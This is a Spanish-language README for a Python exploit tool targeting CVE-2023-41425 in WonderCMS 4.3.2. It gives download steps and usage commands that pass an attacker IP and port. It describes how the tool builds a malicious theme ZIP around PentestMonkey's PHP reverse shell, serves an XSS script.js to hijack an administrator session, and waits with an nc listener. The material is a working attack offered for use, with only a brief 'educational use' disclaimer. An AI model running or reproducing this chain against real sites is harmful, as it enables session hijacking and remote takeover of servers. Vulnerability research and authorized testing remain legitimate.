
Automatiza la creación y alojamiento de un payload JavaScript XSS para instalar un módulo de tema malicioso, desencadenando una reverse shell mediante Ejecución Remota de Código en WonderCMS. Esta herramienta utiliza el script de reverse shell PHP de PentestMonkey como payload.
Esta herramienta ofensiva de seguridad basada en Python automatiza la explotación de una vulnerabilidad de Ejecución Remota de Código (RCE) en WonderCMS 4.3.2, específicamente CVE-2023-41425. Simplifica el proceso de crear un módulo de tema ZIP malicioso y entregar un payload XSS basado en JavaScript para secuestrar una sesión de administrador e implementar una shell reversa PHP.
⚠️ Solo para fines educativos y pruebas de seguridad autorizadas.
El script solo depende de la biblioteca estándar de Python. No se requieren paquetes externos.
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git
cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
Aquí hay un desglose de lo que hace el script internamente:
Análisis de argumentos:
argparse para recopilar entradas requeridas y opcionales del atacante.Preparación de la shell reversa:
$ip y $port con los valores suministrados en -H y -p.Creación del ZIP malicioso:
<dir_name>/<php_reverse_shell.php>.<zip_name>.zip.Generación del payload XSS (script.js):
Instrucciones y alojamiento del exploit:
nc.Esta herramienta se proporciona bajo la Licencia MIT.
Elaborado con 🔥 por TeaOnHack🧋.
Este proyecto está destinado solo para evaluaciones de seguridad educativas y autorizadas. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.
| Argumento | Requerido | Descripción | Por defecto |
|---|
-u | ✅ | URL de inicio de sesión de WonderCMS objetivo (ej. http://target/index.php?...) | — |
-H, --host | ✅ | Dirección IP del atacante (para shell reversa) | — |
-p | ✅ | Puerto de escucha del atacante | — |
-r, --reverse-shell | ✅ | Ruta al script PHP de shell reversa | — |
--dir-name | ❌ | Directorio dentro del archivo ZIP del tema | TeaOn |
--http-port | ❌ | Puerto para el servidor HTTP local | 3000 |
--zip-name | ❌ | Nombre del archivo ZIP generado | reverse-shell |